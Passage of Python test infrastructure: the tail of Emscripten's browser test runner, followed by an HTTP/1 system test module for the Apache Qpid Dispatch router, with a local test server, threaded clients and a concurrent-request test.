cls.also_asmjs = int(os.getenv('EMTEST_BROWSER_ALSO_ASMJS', '0')) == 1
cls.port = int(os.getenv('EMTEST_BROWSER_PORT', '8888'))
if not has_browser():
return
if not EMTEST_BROWSER:
print("Using default system browser")
else:
cmd = shlex.split(EMTEST_BROWSER)
def run_in_other_browser(url):
subprocess.Popen(cmd + [url])
webbrowser.open_new = run_in_other_browser
print("Using Emscripten browser: " + str(cmd))
cls.browser_timeout = 30
cls.harness_in_queue = multiprocessing.Queue()
cls.harness_out_queue = multiprocessing.Queue()
cls.harness_server = multiprocessing.Process(target=harness_server_func, args=(cls.harness_in_queue, cls.harness_out_queue, cls.port))
cls.harness_server.start()
print('[Browser harness server on process %d]' % cls.harness_server.pid)
webbrowser.open_new('http://localhost:%s/run_harness' % cls.port)
@classmethod
def tearDownClass(cls):
super(BrowserCore, cls).tearDownClass()
if not has_browser():
return
cls.harness_server.terminate()
print('[Browser harness server terminated]')
if WINDOWS:
# On Windows, shutil.rmtree() in tearDown() raises this exception if we do not wait a bit:
# WindowsError: [Error 32] The process cannot access the file because it is being used by another process.
time.sleep(0.1)
def assert_out_queue_empty(self, who):
if not self.harness_out_queue.empty():
while not self.harness_out_queue.empty():
self.harness_out_queue.get()
raise Exception('excessive responses from %s' % who)
def run_browser(self, html_file, message, expectedResult=None, timeout=None):
if not has_browser():
return
if BrowserCore.unresponsive_tests >= BrowserCore.MAX_UNRESPONSIVE_TESTS:
self.skipTest('too many unresponsive tests, skipping browser launch - check your setup!')
self.assert_out_queue_empty('previous test')
if DEBUG:
print('[browser launch:', html_file, ']')
if expectedResult is not None:
try:
self.harness_in_queue.put((
asbytes('http://localhost:%s/%s' % (self.port, html_file)),
self.get_dir()
))
received_output = False
output = '[no http server activity]'
start = time.time()
if timeout is None:
timeout = self.browser_timeout
while time.time() - start < timeout:
if not self.harness_out_queue.empty():
output = self.harness_out_queue.get()
received_output = True
break
time.sleep(0.1)
if not received_output:
BrowserCore.unresponsive_tests += 1
print('[unresponsive tests: %d]' % BrowserCore.unresponsive_tests)
if output is None:
# the browser harness reported an error already, and sent a None to tell
# us to also fail the test
raise Exception('failing test due to browser harness error')
if output.startswith('/report_result?skipped:'):
self.skipTest(unquote(output[len('/report_result?skipped:'):]).strip())
else:
self.assertIdentical(expectedResult, output)
finally:
time.sleep(0.1) # see comment about Windows above
self.assert_out_queue_empty('this test')
else:
webbrowser.open_new(os.path.abspath(html_file))
print('A web browser window should have opened a page containing the results of a part of this test.')
print('You need to manually look at the page to see that it works ok: ' + message)
print('(sleeping for a bit to keep the directory alive for the web browser..)')
time.sleep(5)
print('(moving on..)')
def with_report_result(self, code):
return '#define EMTEST_PORT_NUMBER %d\n#include "%s"\n' % (self.port, path_from_root('tests', 'report_result.h')) + code
# @manually_trigger If set, we do not assume we should run the reftest when main() is done.
# Instead, call doReftest() in JS yourself at the right time.
def reftest(self, expected, manually_trigger=False):
# make sure the pngs used here have no color correction, using e.g.
# pngcrush -rem gAMA -rem cHRM -rem iCCP -rem sRGB infile outfile
basename = os.path.basename(expected)
shutil.copyfile(expected, os.path.join(self.get_dir(), basename))
with open(os.path.join(self.get_dir(), 'reftest.js'), 'w') as out:
with open(path_from_root('tests', 'browser_reporting.js')) as reporting:
out.write('''
function doReftest() {
if (doReftest.done) return;
doReftest.done = true;
var img = new Image();
img.onload = function() {
assert(img.width == Module.canvas.width, 'Invalid width: ' + Module.canvas.width + ', should be ' + img.width);
assert(img.height == Module.canvas.height, 'Invalid height: ' + Module.canvas.height + ', should be ' + img.height);
var canvas = document.createElement('canvas');
canvas.width = img.width;
canvas.height = img.height;
var ctx = canvas.getContext('2d');
ctx.drawImage(img, 0, 0);
var expected = ctx.getImageData(0, 0, img.width, img.height).data;
var actualUrl = Module.canvas.toDataURL();
var actualImage = new Image();
actualImage.onload = function() {
/*
document.body.appendChild(img); // for comparisons
var div = document.createElement('div');
div.innerHTML = '^=expected, v=actual';
document.body.appendChild(div);
document.body.appendChild(actualImage); // to grab it for creating the test reference
*/
var actualCanvas = document.createElement('canvas');
actualCanvas.width = actualImage.width;
actualCanvas.height = actualImage.height;
var actualCtx = actualCanvas.getContext('2d');
actualCtx.drawImage(actualImage, 0, 0);
var actual = actualCtx.getImageData(0, 0, actualImage.width, actualImage.height).data;
var total = 0;
var width = img.width;
var height = img.height;
for (var x = 0; x < width; x++) {
for (var y = 0; y < height; y++) {
total += Math.abs(expected[y*width*4 + x*4 + 0] - actual[y*width*4 + x*4 + 0]);
total += Math.abs(expected[y*width*4 + x*4 + 1] - actual[y*width*4 + x*4 + 1]);
total += Math.abs(expected[y*width*4 + x*4 + 2] - actual[y*width*4 + x*4 + 2]);
}
}
var wrong = Math.floor(total / (img.width*img.height*3)); // floor, to allow some margin of error for antialiasing
// If the main JS file is in a worker, or modularize, then we need to supply our own reporting logic.
if (typeof reportResultToServer === 'undefined') {
(function() {
%s
reportResultToServer(wrong);
})();
} else {
reportResultToServer(wrong);
}
};
actualImage.src = actualUrl;
}
img.src = '%s';
};
// Automatically trigger the reftest?
if (!%s) {
// Yes, automatically
Module['postRun'] = doReftest;
if (typeof WebGLClient !== 'undefined') {
// trigger reftest from RAF as well, needed for workers where there is no pre|postRun on the main thread
var realRAF = window.requestAnimationFrame;
window.requestAnimationFrame = function(func) {
realRAF(function() {
func();
realRAF(doReftest);
});
};
// trigger reftest from canvas render too, for workers not doing GL
var realWOM = worker.onmessage;
worker.onmessage = function(event) {
realWOM(event);
if (event.data.target === 'canvas' && event.data.op === 'render') {
realRAF(doReftest);
}
};
}
} else {
// Manually trigger the reftest.
// The user will call it.
// Add an event loop iteration to ensure rendering, so users don't need to bother.
var realDoReftest = doReftest;
doReftest = function() {
setTimeout(realDoReftest, 1);
};
}
''' % (reporting.read(), basename, int(manually_trigger)))
def compile_btest(self, args):
run_process([PYTHON, EMCC] + args + ['--pre-js', path_from_root('tests', 'browser_reporting.js')])
def btest(self, filename, expected=None, reference=None, force_c=False,
reference_slack=0, manual_reference=False, post_build=None,
args=[], outfile='test.html', message='.', also_proxied=False,
url_suffix='', timeout=None, also_asmjs=False,
manually_trigger_reftest=False):
assert expected or reference, 'a btest must either expect an output, or have a reference image'
# if we are provided the source and not a path, use that
filename_is_src = '\n' in filename
src = filename if filename_is_src else ''
original_args = args[:]
if 'USE_PTHREADS=1' in args and not self.is_wasm_backend() and 'ALLOW_MEMORY_GROWTH=1' not in args:
if EMTEST_WASM_PTHREADS:
also_asmjs = True
elif 'WASM=0' not in args:
args += ['-s', 'WASM=0']
if 'WASM=0' not in args:
# Filter out separate-asm, which is implied by wasm
args = [a for a in args if a != '--separate-asm']
args += ['-DEMTEST_PORT_NUMBER=%d' % self.port, '-include', path_from_root('tests', 'report_result.h')]
if filename_is_src:
filepath = os.path.join(self.get_dir(), 'main.c' if force_c else 'main.cpp')
with open(filepath, 'w') as f:
f.write(src)
else:
filepath = path_from_root('tests', filename)
if reference:
self.reference = reference
expected = [str(i) for i in range(0, reference_slack + 1)]
self.reftest(path_from_root('tests', reference), manually_trigger=manually_trigger_reftest)
if not manual_reference:
args = args + ['--pre-js', 'reftest.js', '-s', 'GL_TESTING=1']
all_args = ['-s', 'IN_TEST_HARNESS=1', filepath, '-o', outfile] + args
# print('all args:', all_args)
try_delete(outfile)
self.compile_btest(all_args)
self.assertExists(outfile)
if post_build:
post_build()
if not isinstance(expected, list):
expected = [expected]
self.run_browser(outfile + url_suffix, message, ['/report_result?' + e for e in expected], timeout=timeout)
# Tests can opt into being run under asmjs as well
if 'WASM=0' not in args and (also_asmjs or self.also_asmjs):
self.btest(filename, expected, reference, force_c, reference_slack, manual_reference, post_build,
args + ['-s', 'WASM=0'], outfile, message, also_proxied=False, timeout=timeout)
if also_proxied:
print('proxied...')
if reference:
assert not manual_reference
manual_reference = True
assert not post_build
post_build = self.post_manual_reftest
# run proxied
self.btest(filename, expected, reference, force_c, reference_slack, manual_reference, post_build,
original_args + ['--proxy-to-worker', '-s', 'GL_TESTING=1'], outfile, message, timeout=timeout)
###################################################################################################
def build_library(name,
build_dir,
output_dir,
generated_libs,
configure=['sh', './configure'],
configure_args=[],
make=['make'],
make_args='help',
cache=None,
cache_name=None,
copy_project=False,
env_init={},
source_dir=None,
native=False):
"""Build a library into a .bc file. We build the .bc file once and cache it
for all our tests. (We cache in memory since the test directory is destroyed
and recreated for each test. Note that we cache separately for different
compilers). This cache is just during the test runner. There is a different
concept of caching as well, see |Cache|.
"""
if type(generated_libs) is not list:
generated_libs = [generated_libs]
if source_dir is None:
source_dir = path_from_root('tests', name.replace('_native', ''))
if make_args == 'help':
make_args = ['-j', str(multiprocessing.cpu_count())]
temp_dir = build_dir
if copy_project:
project_dir = os.path.join(temp_dir, name)
if os.path.exists(project_dir):
shutil.rmtree(project_dir)
shutil.copytree(source_dir, project_dir) # Useful in debugging sometimes to comment this out, and two lines above
else:
project_dir = build_dir
try:
old_dir = os.getcwd()
except:
old_dir = None
os.chdir(project_dir)
generated_libs = [os.path.join(project_dir, lib) for lib in generated_libs]
# for lib in generated_libs:
# try:
# os.unlink(lib) # make sure compilation completed successfully
# except:
# pass
env = Building.get_building_env(native, True)
for k, v in env_init.items():
env[k] = v
if configure:
# Useful in debugging sometimes to comment this out (and the lines below
# up to and including the |link| call)
if EM_BUILD_VERBOSE < 2:
stdout = open(os.path.join(project_dir, 'configure_out'), 'w')
else:
stdout = None
if EM_BUILD_VERBOSE < 1:
stderr = open(os.path.join(project_dir, 'configure_err'), 'w')
else:
stderr = None
try:
Building.configure(configure + configure_args, env=env, stdout=stdout, stderr=stderr)
except subprocess.CalledProcessError as e:
pass # Ignore exit code != 0
def open_make_out(i, mode='r'):
return open(os.path.join(project_dir, 'make_out' + str(i)), mode)
def open_make_err(i, mode='r'):
return open(os.path.join(project_dir, 'make_err' + str(i)), mode)
if EM_BUILD_VERBOSE >= 3:
make_args += ['VERBOSE=1']
# FIXME: Sad workaround for some build systems that need to be run twice to succeed (e.g. poppler)
for i in range(2):
with open_make_out(i, 'w') as make_out:
with open_make_err(i, 'w') as make_err:
stdout = make_out if EM_BUILD_VERBOSE < 2 else None
stderr = make_err if EM_BUILD_VERBOSE < 1 else None
if i == 0:
try:
Building.make(make + make_args, stdout=stdout, stderr=stderr, env=env)
except subprocess.CalledProcessError as e:
pass # Ignore exit code != 0
else:
Building.make(make + make_args, stdout=stdout, stderr=stderr, env=env)
try:
if cache is not None:
cache[cache_name] = []
for f in generated_libs:
basename = os.path.basename(f)
cache[cache_name].append((basename, open(f, 'rb').read()))
break
except Exception as e:
if i > 0:
if EM_BUILD_VERBOSE == 0:
# Due to the ugly hack above our best guess is to output the first run
with open_make_err(0) as ferr:
for line in ferr:
sys.stderr.write(line)
raise Exception('could not build library ' + name + ' due to exception ' + str(e))
if old_dir:
os.chdir(old_dir)
return generated_libs
def check_js_engines():
total_engines = len(shared.JS_ENGINES)
shared.JS_ENGINES = list(filter(jsrun.check_engine, shared.JS_ENGINES))
if not shared.JS_ENGINES:
print('WARNING: None of the JS engines in JS_ENGINES appears to work.')
elif len(shared.JS_ENGINES) < total_engines:
print('WARNING: Not all the JS engines in JS_ENGINES appears to work, ignoring those.')
if EMTEST_ALL_ENGINES:
print('(using ALL js engines)')
else:
logger.warning('use EMTEST_ALL_ENGINES=1 in the env to run against all JS '
'engines, which is slower but provides more coverage')
def get_and_import_modules():
modules = []
for filename in glob.glob(os.path.join(os.path.dirname(__file__), 'test*.py')):
module_dir, module_file = os.path.split(filename)
module_name, module_ext = os.path.splitext(module_file)
__import__(module_name)
modules.append(sys.modules[module_name])
return modules
def get_all_tests(modules):
# Create a list of all known tests so that we can choose from them based on a wildcard search
all_tests = []
suites = core_test_modes + non_core_test_modes
for m in modules:
for s in suites:
if hasattr(m, s):
tests = [t for t in dir(getattr(m, s)) if t.startswith('test_')]
all_tests += [s + '.' + t for t in tests]
return all_tests
def tests_with_expanded_wildcards(args, all_tests):
# Process wildcards, e.g. "browser.test_pthread_*" should expand to list all pthread tests
new_args = []
for i, arg in enumerate(args):
if '*' in arg:
if arg.startswith('skip:'):
arg = arg[5:]
matching_tests = fnmatch.filter(all_tests, arg)
new_args += ['skip:' + t for t in matching_tests]
else:
new_args += fnmatch.filter(all_tests, arg)
else:
new_args += [arg]
if not new_args and args:
print('No tests found to run in set: ' + str(args))
sys.exit(1)
return new_args
def skip_requested_tests(args, modules):
for i, arg in enumerate(args):
if arg.startswith('skip:'):
which = [arg.split('skip:')[1]]
print(','.join(which), file=sys.stderr)
for test in which:
print('will skip "%s"' % test, file=sys.stderr)
suite_name, test_name = test.split('.')
for m in modules:
try:
suite = getattr(m, suite_name)
setattr(suite, test_name, lambda s: s.skipTest("requested to be skipped"))
break
except:
pass
args[i] = None
return [a for a in args if a is not None]
def args_for_random_tests(args, modules):
if not args:
return args
first = args[0]
if first.startswith('random'):
random_arg = first[6:]
num_tests, base_module, relevant_modes = get_random_test_parameters(random_arg)
for m in modules:
if hasattr(m, base_module):
base = getattr(m, base_module)
new_args = choose_random_tests(base, num_tests, relevant_modes)
print_random_test_statistics(num_tests)
return new_args
return args
def get_random_test_parameters(arg):
num_tests = 1
base_module = default_core_test_mode
relevant_modes = core_test_modes
if len(arg):
num_str = arg
if arg.startswith('other'):
base_module = 'other'
relevant_modes = ['other']
num_str = arg.replace('other', '')
elif arg.startswith('browser'):
base_module = 'browser'
relevant_modes = ['browser']
num_str = arg.replace('browser', '')
num_tests = int(num_str)
return num_tests, base_module, relevant_modes
def choose_random_tests(base, num_tests, relevant_modes):
tests = [t for t in dir(base) if t.startswith('test_')]
print()
chosen = set()
while len(chosen) < num_tests:
test = random.choice(tests)
mode = random.choice(relevant_modes)
new_test = mode + '.' + test
before = len(chosen)
chosen.add(new_test)
if len(chosen) > before:
print('* ' + new_test)
else:
# we may have hit the limit
if len(chosen) == len(tests) * len(relevant_modes):
print('(all possible tests chosen! %d = %d*%d)' % (len(chosen), len(tests), len(relevant_modes)))
break
return list(chosen)
def print_random_test_statistics(num_tests):
std = 0.5 / math.sqrt(num_tests)
expected = 100.0 * (1.0 - std)
print()
print('running those %d randomly-selected tests. if they all pass, then there is a '
'greater than 95%% chance that at least %.2f%% of the test suite will pass'
% (num_tests, expected))
print()
def show():
print('if all tests passed then there is a greater than 95%% chance that at least '
'%.2f%% of the test suite will pass'
% (expected))
atexit.register(show)
def load_test_suites(args, modules):
loader = unittest.TestLoader()
unmatched_test_names = set(args)
suites = []
for m in modules:
names_in_module = []
for name in list(unmatched_test_names):
try:
operator.attrgetter(name)(m)
names_in_module.append(name)
unmatched_test_names.remove(name)
except AttributeError:
pass
if len(names_in_module):
loaded_tests = loader.loadTestsFromNames(sorted(names_in_module), m)
tests = flattened_tests(loaded_tests)
suite = suite_for_module(m, tests)
for test in tests:
suite.addTest(test)
suites.append((m.__name__, suite))
return suites, unmatched_test_names
def flattened_tests(loaded_tests):
tests = []
for subsuite in loaded_tests:
for test in subsuite:
tests.append(test)
return tests
def suite_for_module(module, tests):
suite_supported = module.__name__ in ('test_core', 'test_other')
has_multiple_tests = len(tests) > 1
has_multiple_cores = parallel_runner.num_cores() > 1
if suite_supported and has_multiple_tests and has_multiple_cores:
return parallel_runner.ParallelTestSuite()
return unittest.TestSuite()
def run_tests(options, suites):
resultMessages = []
num_failures = 0
print('Test suites:')
print([s[0] for s in suites])
# Run the discovered tests
testRunner = unittest.TextTestRunner(verbosity=2)
for mod_name, suite in suites:
print('Running %s: (%s tests)' % (mod_name, suite.countTestCases()))
res = testRunner.run(suite)
msg = ('%s: %s run, %s errors, %s failures, %s skipped' %
(mod_name, res.testsRun, len(res.errors), len(res.failures), len(res.skipped)))
num_failures += len(res.errors) + len(res.failures)
resultMessages.append(msg)
if len(resultMessages) > 1:
print('====================')
print()
print('TEST SUMMARY')
for msg in resultMessages:
print(' ' + msg)
# Return the number of failures as the process exit code for automating success/failure reporting.
return min(num_failures, 255)
def parse_args(args):
parser = argparse.ArgumentParser(prog='runner.py', description=__doc__)
parser.add_argument('-j', '--js-engine', help='Set JS_ENGINE_OVERRIDE')
parser.add_argument('tests', nargs='*')
return parser.parse_args()
def main(args):
options = parse_args(args)
if options.js_engine:
if options.js_engine == 'SPIDERMONKEY_ENGINE':
Building.JS_ENGINE_OVERRIDE = SPIDERMONKEY_ENGINE
elif options.js_engine == 'V8_ENGINE':
Building.JS_ENGINE_OVERRIDE = V8_ENGINE
elif options.js_engine == 'NODE_JS':
Building.JS_ENGINE_OVERRIDE = NODE_JS
else:
print('Unknown js engine override: ' + options.js_engine)
return 1
print("Overriding JS engine: " + Building.JS_ENGINE_OVERRIDE[0])
check_js_engines()
def prepend_default(arg):
if arg.startswith('test_'):
return default_core_test_mode + '.' + arg
return arg
tests = [prepend_default(t) for t in options.tests]
modules = get_and_import_modules()
all_tests = get_all_tests(modules)
tests = tests_with_expanded_wildcards(tests, all_tests)
tests = skip_requested_tests(tests, modules)
tests = args_for_random_tests(tests, modules)
suites, unmatched_tests = load_test_suites(tests, modules)
if unmatched_tests:
print('ERROR: could not find the following tests: ' + ' '.join(unmatched_tests))
return 1
return run_tests(options, suites)
if __name__ == '__main__':
try:
sys.exit(main(sys.argv))
except KeyboardInterrupt:
logger.warning('KeyboardInterrupt')
sys.exit(1)
|
http1_tests.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import socket
import uuid
from threading import Thread
from time import sleep
from http.server import HTTPServer, BaseHTTPRequestHandler
from http.client import HTTPConnection
from http.client import HTTPException
from system_test import TestCase, TIMEOUT, Logger, Qdrouterd, unittest
from system_test import curl_available, run_curl
TEST_SERVER_ERROR = "TestServer failed to start due to port %s already in use issue"
CURL_VERSION = (7, 47, 0) # minimum required
def _curl_ok():
"""
Returns True if curl is installed and is the proper version for
running http1.1
"""
installed = curl_available()
return installed and installed >= CURL_VERSION
class RequestHandler(BaseHTTPRequestHandler):
"""
Dispatches requests received by the HTTPServer based on the method
"""
protocol_version = 'HTTP/1.1'
def _execute_request(self, tests):
for req, resp, val in tests:
if req.target == self.path:
xhdrs = None
if "test-echo" in self.headers:
xhdrs = {"test-echo":
self.headers["test-echo"]}
self._consume_body()
if not isinstance(resp, list):
resp = [resp]
for r in resp:
r.send_response(self, extra_headers=xhdrs)
self.server.request_count += 1
return
self.send_error(404, "Not Found")
def do_GET(self):
self._execute_request(self.server.system_tests["GET"])
def do_HEAD(self):
self._execute_request(self.server.system_tests["HEAD"])
def do_POST(self):
if self.path == "/SHUTDOWN":
self.send_response(200, "OK")
self.send_header("Content-Length", "13")
self.end_headers()
self.wfile.write(b'Server Closed')
self.wfile.flush()
self.close_connection = True
self.server.server_killed = True
return
self._execute_request(self.server.system_tests["POST"])
def do_PUT(self):
self._execute_request(self.server.system_tests["PUT"])
# these overrides just quiet the test output
# comment them out to help debug:
def log_request(self, code=None, size=None):
pass
def log_message(self, format=None, *args):
pass
def _consume_body(self):
"""
Read the entire body off the rfile. This must be done to allow
multiple requests on the same socket
"""
if self.command == 'HEAD':
return b''
for key, value in self.headers.items():
if key.lower() == 'content-length':
return self.rfile.read(int(value))
if key.lower() == 'transfer-encoding' \
and 'chunked' in value.lower():
body = b''
while True:
header = self.rfile.readline().strip().split(b';')[0]
hlen = int(header, base=16)
if hlen > 0:
data = self.rfile.read(hlen + 2) # 2 = \r\n
body += data[:-2]
else:
self.rfile.readline() # discard last \r\n
break
return body
return b''
class RequestHandler10(RequestHandler):
"""
RequestHandler that forces the server to use HTTP version 1.0 semantics
"""
protocol_version = 'HTTP/1.0'
class MyHTTPServer(HTTPServer):
"""
Adds a switch to the HTTPServer to allow it to exit gracefully
"""
def __init__(self, addr, handler_cls, testcases):
self.system_tests = testcases
self.request_count = 0
HTTPServer.__init__(self, addr, handler_cls)
def server_close(self):
try:
# force immediate close of listening socket
self.socket.shutdown(socket.SHUT_RDWR)
except Exception:
pass
HTTPServer.server_close(self)
class ThreadedTestClient(object):
"""
An HTTP client running in a separate thread
"""
def __init__(self, tests, port, repeat=1):
self._id = uuid.uuid4().hex
self._conn_addr = ("127.0.0.1:%s" % port)
self._tests = tests
self._repeat = repeat
self._logger = Logger(title="TestClient: %s" % self._id,
print_to_console=False)
self._thread = Thread(target=self._run)
self._thread.daemon = True
self.error = None
self.count = 0
self._thread.start()
def _run(self):
self._logger.log("TestClient connecting on %s" % self._conn_addr)
client = HTTPConnection(self._conn_addr, timeout=TIMEOUT)
self._logger.log("TestClient connected")
for loop in range(self._repeat):
self._logger.log("TestClient start request %d" % loop)
for op, tests in self._tests.items():
for req, _, val in tests:
self._logger.log("TestClient sending %s %s request" % (op, req.target))
req.send_request(client,
{"test-echo": "%s-%s-%s-%s" % (self._id,
loop,
op,
req.target)})
self._logger.log("TestClient getting %s response" % op)
try:
rsp = client.getresponse()
except HTTPException as exc:
self._logger.log("TestClient response failed: %s" % exc)
self.error = str(exc)
return
self._logger.log("TestClient response %s received" % op)
if val:
try:
body = val.check_response(rsp)
except Exception as exc:
self._logger.log("TestClient response invalid: %s"
% str(exc))
self.error = "client failed: %s" % str(exc)
return
if req.method == "BODY" and body != b'':
self._logger.log("TestClient response invalid: %s"
% "body present!")
self.error = "error: body present!"
return
self.count += 1
self._logger.log("TestClient request %s %s completed!" %
(op, req.target))
client.close()
self._logger.log("TestClient to %s closed" % self._conn_addr)
def wait(self, timeout=TIMEOUT):
self._thread.join(timeout=TIMEOUT)
self._logger.log("TestClient %s shut down" % self._conn_addr)
sleep(0.5) # fudge factor allow socket close to complete
def dump_log(self):
self._logger.dump()
class TestServer(object):
"""
A HTTPServer running in a separate thread
"""
__test__ = False
@classmethod
def new_server(cls, server_port, client_port, tests, handler_cls=None):
num_attempts = 0
max_attempts = 4
while num_attempts < max_attempts:
try:
# Create an instance of TestServer. This might fail because the port has
# not been relinquished yet. Try for a max of 4 seconds before giving up.
server11 = TestServer(server_port=server_port,
client_port=client_port,
tests=tests,
handler_cls=handler_cls)
# Return the successfully created server.
return server11
except OSError:
# TestServer creation failed. Try again in one second, for a max of 4 seconds.
num_attempts += 1
sleep(1)
return None
def __init__(self, server_port, client_port, tests, handler_cls=None):
self._logger = Logger(title="TestServer", print_to_console=False)
self._client_port = client_port
self._server_addr = ("", server_port)
self._server = MyHTTPServer(self._server_addr,
handler_cls or RequestHandler,
tests)
self._server.allow_reuse_address = True
self._thread = Thread(target=self._run)
self._thread.daemon = True
self._thread.start()
def _run(self):
self._logger.log("TestServer listening on %s:%s" % self._server_addr)
try:
self._server.server_killed = False
while not self._server.server_killed:
self._server.handle_request()
except Exception as exc:
self._logger.log("TestServer %s crash: %s" %
(self._server_addr, exc))
raise
self._logger.log("TestServer %s:%s closed" % self._server_addr)
def wait(self, timeout=TIMEOUT):
self._logger.log("TestServer %s:%s shutting down" % self._server_addr)
self.request_count = 0
if self._thread.is_alive():
client = HTTPConnection("127.0.0.1:%s" % self._client_port,
timeout=TIMEOUT)
client.putrequest("POST", "/SHUTDOWN")
client.putheader("Content-Length", "0")
client.endheaders()
# 13 == len('Server Closed')
client.getresponse().read(13)
client.close()
self._thread.join(timeout=TIMEOUT)
if self._server:
self._server.server_close()
self.request_count = self._server.request_count
del self._server
sleep(0.5) # fudge factor allow socket close to complete
def http1_ping(sport, cport):
"""
Test the HTTP path by doing a simple GET request
"""
TEST = {
"GET": [
(RequestMsg("GET", "/GET/ping",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 4,
"Content-Type": "text/plain;charset=utf-8"},
body=b'pong'),
ResponseValidator(expect_body=b'pong'))
]
}
server = TestServer.new_server(sport, cport, TEST)
client = ThreadedTestClient(tests=TEST, port=cport)
client.wait()
server.wait()
return client.count, client.error
class ResponseMsg(object):
"""
A 'hardcoded' HTTP response message. This class writes its response
message when called by the HTTPServer via the BaseHTTPRequestHandler
"""
def __init__(self, status, version=None, reason=None,
headers=None, body=None, error=False):
self.status = status
self.version = version or "HTTP/1.1"
self.reason = reason
self.headers = headers or {}
self.body = body
self.error = error
def send_response(self, handler, extra_headers=None):
extra_headers = extra_headers or {}
if self.error:
handler.send_error(self.status,
message=self.reason)
return
handler.send_response(self.status, self.reason)
for key, value in self.headers.items():
handler.send_header(key, value)
for key, value in extra_headers.items():
handler.send_header(key, value)
handler.end_headers()
if self.body:
handler.wfile.write(self.body)
handler.wfile.flush()
class RequestMsg(object):
"""
A 'hardcoded' HTTP request message. This class writes its request
message to the HTTPConnection.
"""
def __init__(self, method, target, headers=None, body=None):
self.method = method
self.target = target
self.headers = headers or {}
self.body = body
def send_request(self, conn, extra_headers=None):
extra_headers = extra_headers or {}
conn.putrequest(self.method, self.target)
for key, value in self.headers.items():
conn.putheader(key, value)
for key, value in extra_headers.items():
conn.putheader(key, value)
conn.endheaders()
if self.body:
conn.send(self.body)
class ResponseValidator(object):
"""
Validate a response as received by the HTTP client
"""
def __init__(self, status=200, expect_headers=None, expect_body=None):
if expect_headers is None:
expect_headers = {}
self.status = status
self.expect_headers = expect_headers
self.expect_body = expect_body
def check_response(self, rsp):
if self.status and rsp.status != self.status:
raise Exception("Bad response code, expected %s got %s"
% (self.status, rsp.status))
for key, value in self.expect_headers.items():
if rsp.getheader(key) != value:
raise Exception("Missing/bad header (%s), expected %s got %s"
% (key, value, rsp.getheader(key)))
body = rsp.read()
if self.expect_body and self.expect_body != body:
raise Exception("Bad response body expected %s got %s"
% (self.expect_body, body))
return body
class CommonHttp1Edge2EdgeTest(object):
def test_01_concurrent_requests(self):
"""
Test multiple concurrent clients sending streaming messages
"""
REQ_CT = 3 # 3 requests per TEST_*
TESTS_11 = {
"PUT": [
(RequestMsg("PUT", "/PUT/test_01_concurrent_requests_11",
headers={
"Transfer-encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"
},
# ~384K to trigger Q2
body=b'20000\r\n' + b'1' * 0x20000 + b'\r\n'
+ b'20000\r\n' + b'2' * 0x20000 + b'\r\n'
+ b'20000\r\n' + b'3' * 0x20000 + b'\r\n'
+ b'13\r\nEND OF TRANSMISSION\r\n'
+ b'0\r\n\r\n'),
ResponseMsg(201, reason="Created",
headers={"Test-Header": "/PUT/test_01_concurrent_requests_11",
"Content-Length": "0"}),
ResponseValidator(status=201)
)],
"GET": [
(RequestMsg("GET", "/GET/test_01_concurrent_requests_11_small",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={
"Content-Length": "19",
"Content-Type": "text/plain;charset=utf-8",
"Test-Header": "/GET/test_01_concurrent_requests_11_small"
},
body=b'END OF TRANSMISSION'),
ResponseValidator(status=200)),
(RequestMsg("GET", "/GET/test_01_concurrent_requests_11",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={
"transfer-Encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8",
"Test-Header": "/GET/test_01_concurrent_requests_11"
},
# ~384K to trigger Q2
body=b'20000\r\n' + b'1' * 0x20000 + b'\r\n'
+ b'20000\r\n' + b'2' * 0x20000 + b'\r\n'
+ b'20000\r\n' + b'3' * 0x20000 + b'\r\n'
+ b'13\r\nEND OF TRANSMISSION\r\n'
+ b'0\r\n\r\n'),
ResponseValidator(status=200)
)],
}
TESTS_10 = {
"POST": [
(RequestMsg("POST", "/POST/test_01_concurrent_requests_10",
headers={"Content-Type": "text/plain;charset=utf-8",
"Content-Length": "393216"},
body=b'P' * 393197
+ b'END OF TRANSMISSION'),
ResponseMsg(201, reason="Created",
headers={"Test-Header": "/POST/test_01_concurrent_requests_10",
"Content-Length": "0"}),
ResponseValidator(status=201)
)],
"GET": [
(RequestMsg("GET", "/GET/test_01_concurrent_requests_10_small",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
# no content-length, server must close conn when done
headers={"Test-Header": "/GET/test_01_concurrent_requests_10_small",
"Content-Type": "text/plain;charset=utf-8"},
body=b'END OF TRANSMISSION'),
ResponseValidator(status=200)),
(RequestMsg("GET", "/GET/test_01_concurrent_requests_10",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Test-Header": "/GET/test_01_concurrent_requests_10",
"Content-Length": "393215",
"Content-Type": "text/plain;charset=utf-8"},
body=b'G' * 393196
+ b'END OF TRANSMISSION'),
ResponseValidator(status=200)
)],
}
server11 = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS_11)
self.assertIsNotNone(server11, TEST_SERVER_ERROR % self.http_server11_port)
server10 = TestServer.new_server(self.http_server10_port, self.http_listener10_port, TESTS_10,
handler_cls=RequestHandler10)
self.assertIsNotNone(server10, TEST_SERVER_ERROR % self.http_server10_port)
self.EA2.wait_connectors()
repeat_ct = 10
client_ct = 4 # per version
clients = []
for _ in range(client_ct):
clients.append(ThreadedTestClient(TESTS_11,
self.http_listener11_port,
repeat=repeat_ct))
clients.append(ThreadedTestClient(TESTS_10,
self.http_listener10_port,
repeat=repeat_ct))
for client in clients:
client.wait()
try:
self.assertIsNone(client.error)
self.assertEqual(repeat_ct * REQ_CT, client.count)
except Exception:
client.dump_log()
raise
server11.wait()
self.assertEqual(client_ct * repeat_ct * REQ_CT,
server11.request_count)
server10.wait()
self.assertEqual(client_ct * repeat_ct * REQ_CT,
server10.request_count)
def test_02_credit_replenish(self):
"""
